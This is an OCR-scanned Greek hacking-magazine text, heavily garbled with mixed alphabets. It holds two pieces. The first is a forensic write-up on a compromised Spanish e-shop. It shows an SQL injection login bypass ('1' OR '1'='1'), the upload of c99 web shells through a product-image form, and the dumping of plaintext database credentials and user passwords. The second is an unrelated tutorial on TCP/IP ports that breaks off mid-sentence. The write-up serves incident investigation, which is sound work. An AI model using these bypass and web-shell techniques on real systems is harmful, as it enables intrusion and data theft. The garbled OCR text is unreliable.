Κλασικὀ SQL injection, σε οθόνη 
εισαγωγής δεδοµένων. 


Entidades de pago 
Puntos de envio 
Parámetros 
Textos de páginas 
Pagos 
Programas 
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Πμάδα WHITE: Surian Army 


VLLL 


а rdiet m mne —— ман ы 


Па την ιστορία, η ανακάλυψη αυτής της αδυναμίας ἐγινε pe Tn χρήση του 
Hackbar (addon για τον Firefox). Φυσικά, το ἴδιο αποτέλεσµα θα πετυχαἰ- 
vape αν δίναμε απ’ ευθείας την τιμή 1' OR '1'z'1 στο πεδίο της φόρμας, 
που προορίζεται για ro password. Μπαίνοντας λοιπὸν σαν διαχειριστές, 
το прото πράγμα που κοιτάξαμε Tav να δούμε αν παρέχεται апо το 
πρὀγραμμα η δυνατότητα να κάνουμε upload κἀποιο αρχείο. Προφανώς, 
auró που θέλουμε εἶναι να ανεβάσουμµε κάποιο shell. Πράγματι, μετὰ апо 
λίγο ψάξιμο βρήκαμε µια διαδικασία για το ανέβασμα εικόνων, στην NEPI- 
οχἡ εισαγωγἠς των νέων προϊόντων (βλ. εικὀνα 5). 


@ 


File Edit View History Bookmarks Tools Help 


e | | E] - Google 


M s 
— — — 
—— i M 


“ “ο 


P| = |- | 


Από εδώ γίνεται To data entry 


Εικόνα 5 


για ra νέα προϊόντα του site. 


ИУ. 


ή” 


Κ΄ εν. “AW DA 


Productos 


Producto | 
Descripción 


Precio 
Moneda 


Imagen nager Actual del producto: 


Resolución recomendada: 75 x 75 


Destacado |81 


Πολύ συχνὰ, οι φόρμες για то ανέβασμα εἶναι προστατευμένες και ENI- 
τρέπουν povo τη μεταφορὰ εικὀνων (png, jpg, bmp k.An.). Eugic κάναμε 
ша δοκιµἠή va ανεβάσουµε ro δικὀ µας «99 shell και δεν λάβαμε κανένα 
μήνυμα λάθους. Σε auró το σημείο, ὁμως, έπρεπε να απαντήσουμε σε 
δύο ερωτήματα: 


1. Ανέβηκε πράγματι το shell; 
2. Αν ναι, σε noióv κατάλογο τοποθετήθηκε; 


Αν γνωρίζαμε τον κατάλογο στον οποίο καταλήγουν τα upload, θα µπο- 
ρούσαμε να κάνουμε µια δοκιµἠή και να διαπιστώσουμε αμέσως αν πέτυχε 
το ανέβασμα rou shell. Μελετήσαμε για λἰγο τη φόρμα που εἰχαμε µπρο- 
ота µας και ξαφνικά ἦρθε η επιφοϊτηση! H απάντηση ἠταν πολύ απλή: 
Βρισκόμασταν σε uia φόρμα yia ra νέα προϊόντα και η δυνατότητα upload 
αφορούσε στις σχετικὲς εικὀνες. Επομένως, αρκούσε να δούμε σε ποιὀν 
κατάλογο εἶναι ανεβασμένες οι εικὀνες των προϊόντων, που υπάρχουν 
ἠδη στο site! Προφανώς, αυτὀ µπορεί να γίνει πολύ εὐκολα και χωρίς 
να μπούμε στο σύστημα διαχείρισης. Κάνουμε δεξί κλικ στην εικόνα Kå- 
noiou προϊόντος και μετὰ (πάντα στον Firefox) επιλέγουμε ro View Image 
(βλ. εικὀνα 6). 
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3 ασ ag MS n, МУУ г 129 РИМ) - Mozilla Firefox = B 
Eile Edit View History Bookmarks Tools Help 


ΕΙ , όν ΡΣ | РҮ" ГА А РР ΄ | + | 
€ № 


Εικόνα 6 

Πολλὲς φορές 

οι στοιχειώδεις 
πληροφορἱες εἰναι 
παραπάνω απὀ 
διαφωτιστικές! 


μα 


Αμέσως βλέπουμε Or! οι εικόνες αποθηκεύονται στον κατάλογο /admin/ 
images. Κατὰ συνέπεια, av ro shell εἶχε το ὀνομα customerInfo.php, θα 
αρκούσε να επισκεφτούμε τη διεύθυνση http://www.***.com/admin/images/ 
customerInfo.php. Όπως αντιλαμβάνεστε, κάναμε αμέσως τη σχετικἠ δο- 
кїнї και το shell εκτελέστηκε кауомка (βλ. εικόνα 7). 


š ФРИРАН. Locus?Shell - Mozilla Firefox =. m 
Eile Edit View History Bookmarks Tools Help 


λα... κ PRU. Mar Р A f a r ҮҮ УИ Iih + 


Nobody Shell Modified by Nobody 


f E- Google p| ж |- 
с100 GR-Commander! 


Software: Apache. 
uname -a: Linux tuscan.websitewelcome.com 3.2.38 #1 SMP Tue Feb 12 00:26:52 CST 2013 x86_64 
Disabled functions: dl Εικόνα 7 


We are: uid= ⁄ ⁄ ‚ ⁄ д 
син: To shell µας εἶναι 
Register globals: έτοιμο! 
MySQL: 

MSSQL: 

PostgreSQL: OFF 

Oracle: OFF 

Safe-mode: 


Free 1936.54 GB of 2749.17 GB (70.4496) 
Your ip: - Server ip: 


а <= - аве ® 


Listing folder (134 files and 1 folders): 


z 
8 


ттттттщшш 


5555555595; 


Πμάδα WHITE: Surian Army 


“0 


Δυστυχώς, η χαρά µας δεν κράτησε πολύ! Σε κάθε ενέργεια nou προσπά- 
θησα να κάνω ἐπαιρνα κι ἑνα 403 (Forbidden) anó τον server. Υπήρχε 
βλέπετε κάποιος μηχανισμός προστασίας. Κάπως ἑτσι σκέφτηκα να ανε- 
βάσω ἑνα encrypted shell, το οποίο δεν θα ἦταν ορατὀ στον server. Με 
τον ἰδιο τρόπο, λοιπὸν, ανέβασα µια κρυπτογραφημένη εκδοχἠ του «99. 
То колпак µου πέτυχε! Μπορούσα πλέον va αλωνίσω στον server και 
να ψάξω για στοιχεἰα ...апо τη Συρία. To прото nou ἐλεγξα ἦταν αν εἶχε 
ανέβει πουθενὰ το yvooró Syrian Shell. Μέσω του δικού µου shell, ἑψαξα 
στον server για αρχεία µε τις λέξεις κλειδιά SyRiAn Sh3ll. Όπως αντι- 
λαμβάνεστε, πρὀκειται για δύο λέξεις που βρίσκονται στον κὠδικα του 
εν λόγω shell και ката κάποιον τρὀπο το ταυτοποιούν. Στην αναζήτησή 
µου χρησιμοποίησα το grep και σύντομα κατέληξα σε ἑνα συγκεκριµένο 
αρχείο στον δίσκο του server (βλ. εικὀνα 8). 


@ ve nn - c99madshell - Mozilla Firefox - "Es 
File Edit View History Bookmarks Tools Help 
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є fr 


.1C99madShell v. 2.0 madnet edi 


Software: Apache. PHP/5.2.17 
uname -a: Linux tuscan.websitewelcome.com 3.2.38 #1 SMP Tue Feb 12 00:26:52 CST 2013 x86 64 
uid— ‚ ^ 


Safe-mode: OFf secure 


Free 1936.44 GB of 2749.17 GB (70.44%) 


HOME <= => UPDIR Search Buffer Tools Proc. FTP brute Sec. SQL РНР-сойе Self remove Logout 


Εικόνα 8 

H αναζήτηση yia ro 
Syrian Shell οδήγησε 
σε ἑνα συγκεκριµένο 
αρχείο: Στο web.php! 


Display in text-area 


Αυτὸ το αρχείο δεν ñTav ἄλλο апо το περἰφηµο Syrian Shell. Περιττὀ va 
σας πω ὁτι auró ro shell φυλασσόταν κάποτε σαν *то* απόλυτο μυστικό, 
αφού κατάφερνε να κρύβεται апо τα περισσότερα συστήματα άμυνας 
жхоріс̧* να εἶναι κρυπτογραφημένο. То ἰδιο συνέβαινε κι εδὠ. Το Zupiakó 
shell тау προσβάσιμο апо το web και δούλευε άψογα (βλ. εικόνα 9). 


Πλέον, auró που έπρεπε να κάνουμε ἦταν να βρούμε τον τρόπο µε τον 
οποίο φυτεύτηκε To shell. Ἡμασταν σχεδὀν σίγουροι бт! αυτός ο τρόπος 
δεν διέφερε και πολὺ апо τον τρὀπο nou χρησιμοποιήσαμε εμείς. Εν oÀi- 
γοις, παραβίαση του admin panel και upload µέσω της φόρμας των νέων 
προϊόντων. Av το £kavav ἑτσι, εἶναι πολὺ πιθανό va ἐχει μείνει εκείνο το 
«νέο προϊόν» στο αρχείο των προϊόντων. Βλέπετε, για να γίνει ro upload 
µιας εικόνας, έπρεπε να καταχωρηθεἰ éva ολόκληρο νέο npoióv. Map’ 
όλα αυτά, δεν προχωρήσαμε αμέσως σε aurr| την αναζήτηση. Συνεχἰσα- 
µε ψάχνοντας για ἄλλες πληροφορίες, πολὺ πιο προφανείς και εύκολες 
στον εντοπισμὀ. Το Zupiakó shell εἶχε ανέβει µε τον буора web.php, Ka- 
ταλάμβανε 111,38KB και εἶχε γραφτεὶ στον server στις 13/12/2012, στις 
21:23:51 τοπικἠ opa (βλ. εικόνα 10). 
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ΝΟΝΕ 
ExecuteCommand | 


nge Now! | 


@ SyRiAn Sh3ll ~ V7~ [ B3 Cr34TIV3 Or D!3 TRy!nG ] - Mozilla Firefox = m 
File Edit View History Bookmarks Tools Help 
proa free. лт ptr «ο ЎА Í< μυ. it ph LL Mtn ας #/ | + | 
f Ε] - Googie IE 


Εικόνα 9 

To πρώτο єйрпиа της αποστολἠς µας ἦταν 
γεγονός: To SyRiAn Sh3ll ήταν φυτεμένο στον 
server kai λειτουργούσε áyoya! 


[commadtie aii 


| Execute | 


| | Get File Bind Connection 


Ακολούθως ψάξαμε στο αρχεὶο των προϊόντων, για να δούμε αν υπήρχε τίποτα 
σχετικὀ. Πράγματι, το αρχείο web.php υπήρχε μέσα στο αρχείο των προϊό- 
ντων ως προϊὸν (!) και µε ro ὀνομα «а» (βλ. εικὀνα 11). 


Το παραπάνω εύρημα επιβεβαίωσε Оті οι επιτιθέµενοι μπήκαν κι ανέβασαν 
TO shell µε τον ἰδιο τρόπο nou το κάναμε κι εμείς. Н αποστολἠ µας όµως δεν 
ολοκληρωθεἰ ακόμα. Θέλαμε να ψάξουμε περισσότερο, μήπως βρούμε про- 
σθετες αποδείξεις. Έτσι, orpagr|kaue στη βάση δεδοµένων. Εφόσον εἰχαμε 
ἡδη το c99 shell, δεν ἦταν δύσκολο va σπάσουµε τη βάση (> т.А. Διαβάστε 
TO σχετικὀ άρθρο oro deltaHacker 009). Ξεκινήσαμε εντοπἰζοντας το σχετικὀ 
configuration file και τότε σταματήσαμε! Το αρχείο eixe extension «inc» (βλ. 
εικὀνα 12). Αυτὸ απὀ µόνο του ἐχει ἑνα βασικὀ μειονέκτημα: Av o server δεν 
εἶναι κατάλληλα σεταρισμένος, τα περιεχόμενα του συγκεκριμένου αρχείου 
εἶναι προσβάσιμα απὀ το web! 


Μα, τι απρὀσεκτο setup! Το configuration file που περιέχει τα credentials της 
βάσης δεδομένων βρίσκεται σε δημόσια θέα. Βέβαια, εφόσον η χρήση του 
MySQL server ἐχει καθοριστεί να γίνεται μόνο топіка (αποκλειστικἁ апо τον 
localhost), η παραπάνω плпрофоріа δεν ἦταν πολύ χρήσιμη για τους ...περα- 
στικούς. Εμείς όμως εἶχαμε το shell! Χρησιμοποιώντας та credentials, λοιπὸν, 
αποκτήσαμε πλήρη πρόσβαση στη βάση δεδοµένων. Όταν συνδεθήκαμε о” 
αυτή πήγαμε κατευθείαν --πού αλλού;-- στο αρχείο των χρηστών. Σκοπὸς 
μας ἦταν να βρούμε ἄλλους χρήστες καθώς και τα αντίστοιχα passwords, та 
οποία μπορεί να αποδεικνύονταν χρήσιμα στο μέλλον (βλ. εικόνα 13). 
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Πμάδα WHITE: Surian Army 
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@ "e 4» Productos - Mozilla Firefox = m= 

File Edit View History Bookmarks Tools Help 
J> таи nm ------ УУЛУУ dt) 
€ 2 d 3 е | ЛЕЗ - Googie ΟΙ ж |- 
^ 


€ 


— wh 


Productos 
Categoria |Artesanía (piezas únicas) v | 
Producto a 
Descripción [ᾳ Εικόνα 11 
| Το «νέο проїду», που στην ουσία 
] αποτελούσε το Syrian shell. Θα το 
αγὀραζε ἀραγε κανείς; :) 
Moneda [Г 
Imagen Imagen actual del producto: 
Browse.. | Resolución recomendada: 75 x 75 pixels 
| Destacado [8ἱ v| 
Imágenes complementarias 
- ] Browse.. |! Resolución recomendada: 300 x 300 pixels 
Imagen2 Imagen2: 
| | Browse.. | Resolución recomendada: 300 x 300 pixels 
Imagen3  Imagen3: . E m 
d Mozilla Firefox 
Ele Edit View History Bookmarks Tools Help 


EM © denm P p 


€ > 4 Е ΣῊ 


rms.inc 


«3 


// Connection Parameters 
5 pathtoado 
$ provider 


Eikóva 12 
Εξαιρετικἁ kak) επιλογή 
για file extension... 


"admin/adodb"; 
"mysqli"; 


S host = "localhost"; 


$ user = "KA A) delit" : 

5 password προ μβη; 

$ dbname = πο ΔΕ #4": 
"> 
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2 99madshe a Firefo = x 
f 5 
!C99madShell v. 2.0 madnet edition! 
HOME UPDIR Search Buffer Tools Proc. FTP brute Sec. SQL PHP-code Self remove Logout 
SQL Manager: 
MySQL 5.5.23-55 (proto v.10) running in localhost:3306 as ΄ " pne 
[ Index ] [ Query ] [ Server-status ] [ Server variables ] [ Processes ] [ Logout ] 
Home 
There are 12 table(s) in this DB (f )- 
==: UI s: = Create new table: Dump DB: 
> carrito [πολ [ox] 
» categorias (7) — ШЕТ 
> clientes (8) 
» entidades pagos (3) 
» envios (1) Table usuarios (5 cols and 2 rows) 
» pagos (0) [Structure] [Browse] [Dump] [Insert] 
» parametros (2) 
» pedidos (1) o 
» productos (30) From: [0 то: |30 
> programas (0) 
> textos (2) 
> usuarios (2) 
Ш | id usuario | nombre usuario | pase | nivel | Acti 
. 1 ADMINISTRADOR d Y 7 DEL EDIT 
Εικόνα 13 admin | 
Το αρχείο των 2 Claudio 1 DEL EDIT 
Χρηστών της βάσης 
δεδοµένων... IEEE. 
3 99madshe a Firefo - x 
!C99madShell v. 2.0 madnet edition! 
/ м ЛУУ, / Εικόνα 14 
: νο Ιδού ra domain και FTP logs. 
uw Mu Εδώ χρειάζεται μελέτη... 
HOME <= => UPDIR Search Buffer Tools Proc. FTP brute Sec. SQL PHP-code Self remove Logout 
Listing folder (2 files and 0 folders): 
Name Size Modify Owner/Group Perms Action 
LINK 16.02.2013 04 root/wi τα 
LINK 15.02.2013 06 root/fc τα 
ftp. com-ftp_log 104.66 KB 26.05.2011 15: root/fc τευ M 
.com 63.66 KB 16.02.2013 04:34: root/fc: IED | 


Enter: 


: Command execute :: 


Execute 


Unselect all | with selected: [8 


= Search :: 


i: Make Dir :: 


i: Upload :: 


:: Make File :: 


Πμάδα WHITE: Surian Army 
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Σε αυτή την αναζήτηση µας περίμενε акора µια ἐκπληξη: Πρόκειται 
για To password του administrator. Ἠταν τόσο anAó που ἆγγιζε τα ópia 
TOU γελοίου! Έτσι, αρχίσαμε να αμφιβάλλουμε για το αν οι επιτιθἐµενοι 
βρήκαν ὀντως το SQL Injection ἡ av μάντεψαν το αστείο password rou 
administrator. Επίσης, αξίζει να αναφέρω ὁτι ra passwords στον nivaka 
της βάσης ἦταν σε μορφὴ plain text! Επιπρὀσθετα, апо τον πἰνακα των 
προϊόντων ανακαλύψαμε την ημερομηνία και την ора nou ἐγινε η εισα- 
γωγἠ του «προϊόντος» µε ro ὀνομα «a» (αυτό, δηλαδή, που εἶχε oc ano- 
τἐλεσμα την εισαγωγἠ rou Syrian Shell). Μετά κι anó ro σκάλισμα στη 
βάση, ἑφτασε η opa να δούμε та logs. Εκεἰ ἦταν πιθανὀ να βρούμε την IP 
αυτών που χρησιμοποίησαν ro Syrian Shell, ὥστε να μάθουμε περισσὀ- 
тєра yia τη δράση τους. Όπως καταλαβαίνετε, σε αυτὲς τις περιπτώσεις 
η IP δεν δείχνει την πηγἠ της επίθεσης, αλλά παρέχει πληροφορίες για 
τη μεθοδολογία των επιτιθέµενων. Πάνω като, ra logs βρίσκονται σε 
συγκεκριμένες θέσεις στον server και δεν δυσκολευτήκαμε να τα βρούμε 
(βλ. εικόνα 14). 


Прота αναλύσαμε ra domain logs και ψάξαμε να βρούμε апо ποιες IP 
υπήρχαν αναφορές στο πρόγραμμα web.php. Εκτὸς των ἄλλων, υπήρχαν 
πολλὲς κλήσεις προς το συγκεκριµένο πρὀγραμμα апо διευθύνσεις που 
ανήκουν στην Αἰγυπτο (βλ. εικὀνα 15). Μετά προχωρήσαµε ora FTP logs, 
αλλά δεν βρήκαμε τίποτα το ύποπτο. Oi επιτιθέµενοι, λοιπὀν, δεν χρησι- 
µοποἱησαν ποτὲ την υπηρεσία FTP. 


Τελικά, ο στόχος επετεύχθη: Βρήκαμε το backdoor στον server, μάθαμε 
πότε ακριβώς τοποθετήθηκε εκεἰ, εντοπἰσαμε την αδυναμία και τον τρόπο 
που τοποθετήθηκε και, τέλος, βρήκαμε τις διευθύνσεις ІР апо τις οποίες 
χρησιμοποιήθηκε ro Syrian Shell. Προφανώς, όλα τα παραπάνω συγκε- 
ντρώθηκαν σε µια αποκαλυπτικἠ αναφορά, την οποία και στείλαμε στον 
πελάτη. Σε γενικὲς γραμμές, αυτὸ που ¿xw να προσθέσω εἶναι бт! δεν 
μοιάζει για δουλειὰ κάποιας κρατικἠς υπηρεσίας. To προσωπικὀ σε µια TÈ- 
тоа ομάδα θα λάμβανε πολλά µέτρα για να καλύψει τα ἴχνη της επίθεσης. 
Εξάλλου, ποια κρατικἠ υπηρεσία θα ανἐβαζε shell µετο ὀνομά της επάνω; 


j 
΄ 4 f ni H i 
py " 64/24 Ката τη µελέτη των logs &ariácaye στα requests 
¿ που αφορούσαν στη κλήση του web.php... 
Z ZZ 477 Ζ Z f ΄ ΄ p p Л > M d 
4 7 ο τρ 4 Arp “ Fou nis 
H1.44.154.202 - - [16/Feb/2013:02:36:49 -0600] "GET / #8 "ph 2 
41.44.154.202 - - [16/Feb/2013:02:36:50 -0600] "GET /favicon.ico HITP/1.1" 200 - "-" "Mozilla/5 
30 41.44.154.202 - - [16/Feb/2013:02:36:50 -0600] "GET /@@ “5, 
31 41-44 154 202 - - [16/Feb/2013:02:37:06 -0600] "POST /44 «ρ΄, 
32  83.44.154-202 - - [16/Feb/2013:02:37:20 -0600] "GET ρε 
33  81.44.154.202 - - [16/Feb/2013:02:37:32 -0600] "POST /#& — 
34 41.44 154 202 - - [16/Feb/2013:02:38:36 -0600] "POST /--- — 
ss ΗΕ Д 2 ^" WE / — — # 
ροή V P, 7 7 м "Жуу —M 4 
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4/web.php НТТР/1.1" 200 44548 


/web.php?id-mainPage НТТР/1.1 
4/web.php?id-mainPage HTTP/1. 
/d.php HIIP/1.1" 200 3804 "-" 
4sA/d.php НТТР/1.1" 200 4023 "h 
/d.php HTTP/1.1" 200 140416 
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Εδὠ nou τα λέμε, aurr| µας η συμπεριφορά δεν εἰναι καθόλου παράξενη. 
τουναντίον, η λεγόμενη αφηρημένη σκέψη εἶναι µια ξεχωριστή, εξαιρετι- 
ка χρήσιμη ικανότητα του ανθρώπινου νου. Σε αντίθεση µε τα ζώα, µπο- 
ρούμε, π.χ., να μιλάμε µε χαρακτηριστικἠ άνεση για τον κύκλο, τον αριθ- 
uò 5, ¿va εξωτικὀ νησὶ ἡ το 75%, και va µην εννοούμε κάτι συγκεκριµένο 
— οὐτε καν κάτι το χειροπιαστὀ. Αντίθετα, μπορούμε να αναφερόμαστε 
σε ολόκληρες κατηγορίες. Βεβαίως, η αφηρημένη σκέψη μάς επιτρέπει 
να σκεπτὀµαστε και μεταφορικά. Αυτό κάνουμε όταν, N.X., μιλάμε για την 
υπερχείλιση στοίβας ἡ yia τη θύρα 1194/UDP. 


Έχουμε μάλιστα την ικανότητα να στηριζόµαστε πάνω σε εντελὼς αφη- 
ρημένες ἐννοιες και να εισάγουµε νέες ἡ ακόμη και να δημιουργούμε 
πράγματα που υφίστανται στον πραγματικὸ κόσμο. Πάρτε για παράδειγ- 
μα το Internet. Εἶναι ἑνα ανθρώπινο, εξαιρετικἀ πολύπλοκο δημιούργημα 
που βασίζεται πάνω στην αφηρημένη ἐννοια του TCP/IP stack, η onoia 
µε τη σειρἁ της βασίζεται στην αφηρημένη £vvoia του πρωτοκόλλου επι- 
κοινωνίας. Διαβάστε το σχετικὀ άρθρο στο deltaHacker 004 και θα δείτε 
για τι πράγμα μιλάμε. 


Evo λοιπὸν συχνὰ εἶναι απόλυτα φυσιολογικὀ να αναφερόμαστε σε αφη- 
ρημένες έννοιες ἠ/και να χρησιμοποιούμε μεταφορὲς χωρίς να εἶμαστε 
100% σίγουροι για τι πράγμα μιλάμε, апо την ἄλλη εσεἰς тора διαβάζετε 
va περιοδικὀ µε rov τίτλο «deltaHacker» στο εξὠφυλλό του. Το χάκινγκ, 
ὁπως πολύ καλά γνωρίζετε, εἶναι κἀτι που για διαφορετικούς ауӨро- 
πους σημαίνει διαφορετικά πράγματα. Μπορεί δηλαδὴ ν΄ αρχίσουμε και 
να συζητάμε HE TIG ὡρες για το χάκινγκ, τους χάκερς, την пекі τους, τι 


Σχήμα1 κα ακριβώς κάνουν, τι τους αρέσει, αν πράγματι καταναλώνουν υπερβολικἐς 
Επικοινωνία δύο 


8 ποσότητες πίτσας κ.λπ. κ.λπ., και τελικἀ ἄκρη να µη βγάλουμε. Στοιχη- 
boxes του ἰδιου А i wa z i CAM 
τοπικού δικτύου, µατίζουµε όμως ὁτι όλοι θα συμφωνήσουμε στο εξής: Οἱ (σωστοί) χάκερς 
µέσω TOU πρωτο- ανήκουν σ’ εκείνη την κατηγορία των ανθρώπων, οι οποίοι θέλουν να 
κόλλου ΕΤΡ. Στην γνωρίζουν πολύ καλὰ γιατι πράγμα μιλάνε. Το ἴδιο ισχύει και για εκείνους 
Πραγματικότητα, που δεν θεωρούν εαυτούς χάκερ, ὠστόσο τους αρέσει να διαβάζουν va 


yia την επίτευξη 


: περιοδικὀ µε τον τίτλο «deltaHacker» --πού αλλού-- στο εξὠφυλλό του. 
της επικοινωνίας 


Ro a CA με Υπάρχουν πολλὰ παραδείγματα που θα μπορούσαμε να δώσουμε για να 
М του TCPAP- στηρίξουμε την unó8goñ µας — και δεν θα χρειαζόταν καν va катафо- 
stack. γουµε σε μεταφορές. Πα va τιμήσουμε ωστόσο τον τίτλο αλλά και TO 
Box 1 (Windows host) Box 2 (FreeBSD host) 
I> mi Lad i 
Application Filezilla FTP client lm ProFTPD FTP server Mod ron Maono 
| TCP 
TCP 


Transport λεπτομέρειες της επικοινωνίας 


—Ó—ÓÁ— ‚| ТСР πρωτόκολλα που αφορούν στις 
! 


Network IP IP 


protocol 


є Ethernet š 
Link Ethernet driver | #—*-------—---=-l Ethernet driver 


protocol 


Ωραίο καλώδιο Ethernet 
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Πώς δουλεύουν τα δίκτυα 
Αα 


κεντρικὀ θέμα του παρόντος άρθρου, ας μιλήσουμε για την εντελὠς афп- 
ρημένη ἐννοια της θύρας, πόρτας ἡ port. Όπως θέλετε neite το, σημασία 
δεν ἐχει. 


Σημασία ἐχει бт! соҳа πυκνά μιλάμε για ανοικτά και κλειστά ports, та 
οποία ἄλλες φορές εἶναι TCP κι ἄλλες UDP. Μετὰ βέβαια εἶναι και то port 
forwarding, το οποίο το κάνουν οι routers κι ευτυχώς δηλαδή nou το 
κάνουν, γιατί αλλιώς nog Ва µπαϊναμε στον υπολογιστή που βρίσκεται 
στο σπἰτι στην Καλαμαριά, апо την καφετέρια στην Αριστοτέλους, την 
παραλία στο Λευκαντὶ ἡ το KéoAafik, που εἶναι το διεθνές αεροδρόμιο 
της Ισλανδίας. 


Προσέξτε тора τι γίνεται: Evo ὁλοι μιλάμε µε ἀνεση yia ports, nporó- 
κολλα μεταφορὰς κι ανακατευθύνσεις, αυτό δεν σημαίνει От! όλοι κα- 
τανοούμε τι στο кало εἶναι, επιτέλους, va port, οὐτε γιατὶ εἶναι ana- 
pairnro auró ro port forwarding. Πιστεύετε ότι υπερβάλλουμε; Αν ναι, 
σας προκαλούμε να δώσετε тора, апо μέσα σας, µια ακριβὴ περιγραφἠ 
της ἐννοιας του port. Av το πετύχετε, ε, τότε δεν ἐχετε κανένα λὀγο να 
συνεχίσετε το διάβασμα του παρόντος άρθρου. Πριν ὁμως φύγετε, na- 
ρακαλούμε, μείνετε για λἰγο και πεἰτε µας πόσες φορὲς ἐχετε εξηγήσει, 
ξανὰ και ξανὰ, τι εἶναι το port forwarding, γιατὶ χρειάζεται να γίνεται και, 
το σημαντικότερο, πῶς στο кало γινέται. 


Νομίζουμε ὁτι, ως περιοδικὀ που αν µη τι ἄλλο та το ὀνομὰ του, ἐχει 
έρθει η opa να βάλουμε τα πράγματα σε µια σειρά, φυσικά και να εξηγἠ- 
OOUE επακριβώς ὁλες αυτὲς τις --χρήσιμες, πρέπει να πούμε-- ἐννοιες. 
Па τη συνέχεια θεωρούμε δεδομένο бт! έχετε διαβάσει τουλάχιστον το 
ἆρθρο που ξεκινά апо τη σελἰδα 12 rou deltaHacker 004. Επἰσης, калд 
θα ἦταν va ἐχετε διαβάσει κι εκείνο που ξεκινά anó τη σελίδα 90 του 
deltaHacker 005, ὁπως επἰσης και το άρθρο nepi subnetting, στο site του 
περιοδικού: 


http://deltahacker.gr/?p=5138 


Ροή δεδομένων µέσω encapsulation και demultiplexing 


Ὅπως Φαίνεται στο σχήμα 1, το οποίο επαναλαμβάνουμε εδώ апо то 
σχετικὀ άρθρο στο deltaHacker 004, κάθε φορά που χρησιμοποιούμε ша 
δικτυακἠ εφαρµογἡ υπάρχει ша рог} δεδομένων μεταξύ των διαφορετι- 
Kov επιπέδων του TCP/IP stack. Ας επικεντρὠσουμε την просоҳђ µας 
στο αριστερὀ μέρος του σχήματος, ónou βλέπουμε να үїуєта! χρήση του 
Filezilla FTP client. Στη θέση του Filezilla θα μπορούσε να εἶναι µια οποια- 
δήποτε ἄλλη δικτυακἠ εφαρµογή, περιττὸ να πούμε. Αυτό που έχει on- 
paoia εἶναι να καταλάβουμε τι γίνεται ὁταν η εφαρµογἡ στέλνει кат! στο 
δίκτυο, π.χ., όταν o Filezilla στέλνει µια εντολἠ για αλλαγή καταλόγου 
στον απομακρυσμένο FTP server. Δείτε тора το σχήμα 2. Αυτά τα «δεδο- 
μένα χρήστη», πάνω πάνω, τα παρέχει ο χρήστης µέσω της εφαρµογής. 
Πριν φύγουν για το επίπεδο rou TCP, το Filezilla προσθέτει μερικὲς ἐξτρα 
πληροφορίες στα δεδομένα, οι οποὶες λένε кат! του στιλ: 


Εγώ, ο Filezilla, θέλω να στείλω аита τα δεδομένα, φροντίστε πα- 
ракало για ra δέοντα. 


Tic πληροφορἱες αυτές τις επισυνάπτει µε τη µορφή rou application 
header. To TCP, ἑνα επἰπεδο πιο κάτω, παἰρνει τα δεδοµένα χρήστη μαζὶ 
µε το application header και σκέφτεται: 
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δεδοµένα χρήστη 


Application layer (FTP) 


Y Y Transport layer (TCP) 


TCP header 


|<----- — TCP segment —————— = | 
Y Network layer (IP) 
| 
| 
| 


TCP header δεδοµένα εφαρµογής 


γ 


Ethernet Ethernet 
IP header |TCP header δεδοµένα εφαρµογής 
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Σχήμα 2 

Καθώς ra δεδομέ- 
να που στέλνει o 
χρήστης µέσω της 
δικτυακής εφαρ- 
μογἠς κατεβαίνουν 
στο TCP/IP stack, 
σε κάθε επίπεδο 
της στοίβας προ- 
στίθενται headers 
µε χρήσιμες πλη- 
ροφορίες. Αυτές 
θα αξιοποιηθούν 
όταν τα δεδομένα 
ξεκινήσουν την 
αντίστροφη πορεία 
στη στοίβα, στον 
απομακρυσμένο 
υπολογιστή. 
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SEP === == IP datagram ---------- >| 


Link layer (Ethernet driver) 


Ωραίο καλώδιο Ethernet 


Όλες αυτές οι λεπτομέρειες που µου λέτε, εσείς οι апд πάνω, u” αφήνουν 
паүєра αδιάφορο. Αλλά επειδή τέλος πάντων δουλειά µου εἰναι να βοηθώ, 
θα θεωρήσω δεδομένα χρήστη κι application header ως μία οντότητα που 
θα ovouáco application data. Θα προσθέσω κι εγὠ μερικὲς ἐξτρα πλη- 
ροφορίες, o” éva ωραιότατο TCP header, κι όλα аита μαζί θα τα στείλω 
στους προκομμένους εκεί κάτω, στο επίπεδο TOU IP. 


H πληροφορία που στέλνει το TCP στο IP, δηλαδή application data και 
TCP header μαζί, ονομάζεται TCP segment. Το IP µε τη σειρὰ του προ- 
σθέτει ἑνα IP header κι όλα αυτά τα στέλνει στο επἰπεδο Link, апо 
κάτω. Αυτὀ που λαμβάνεται στο Link εἶναι το λεγόμενο IP datagram. Αν 
θέλουμε va εἰμαστε ακριβεὶς £00, οφείλουμε να σημειώσουμε От! μεταξύ 
IP και Link διακινούνται πακέτα, packets. Κάθε πακέτο εἶναι εἰτε ἑνα IP 
datagram εἰτε ¿va κομμάτι κάποιου IP datagram, το λεγόμενο fragment. 
Το τι απὀ τα δύο εἶναι εξαρτάται απὀ το λεγόμενο Maximum Transmission 
Unit (MTU) rou εκἁστοτε link. Αλλά ας µην ξεφεύγουμε. 


Με την προὐπόθεση Ori η δικτυακἡ σύνδεση του υπολογιστή στον οποίο 
τρέχει το FileZilla γίνεται μέσω κάρτας Ethernet, στο επιπεδο Link προ- 
στἰθεται το λεγόμενο Ethernet header, μαζί µε ro Ethernet trailer. To 
Ethernet header pači нє ro IP packet kai ro Ethernet trailer, συγκροτούν 
TO λεγόμενο Ethernet frame: Μεταφορικά, μπορούμε va πούμε бт! αυτό 
akpiBog εἶναι που ταξιδεύει ката μήκος rou καλωδίου Ethernet, µε τη 
µορφή µιας ροής апо bits (bitstream). To τι συμβαίνει σε κάθε frame όταν 
Φτάνει στον προορισμό του, προς то παρὀν δεν µας ενδιαφἑρει — αν και 
στοιχηματίζουμε бт! μπορείτε να φανταστείτε. To onpavrikó εδὠ εἶναι va 
συνειδητοποιήσουμε πως όταν µια δικτυακἠ epappoyr| στέλνει δεδοµένα 
μέσω του πρωτοκόλου TCP, τότε υπάρχει ша рой πληροφορίων ката p- 
κος rou TCP/IP stack µε фора апо πάνω προς ra κάτω. Κάθε επἰπεδο, στα 
δεδομένα που паіру апо πάνω προσθέτει ἐξτρα πληροφορίες, τις οποίες 
βάζει στο header ка! μερικὲς φορὲς στο λεγόμενο trailer. 


Ουασιαστικἁ, αυτὸ nou γἰνεται εἰναι το λεγόμενο encapsulation (εν- 
θυλάκωση) των δεδομένων, τα οποία ξεκινούν το ταξίδι τους απὀ το 


Πώς δουλεύουν τα δίκτυα 
ri 


Application layer. Ta ἐξτρα δεδοµένα που σε ká8& επἰπεδο επισυνάπτονται 
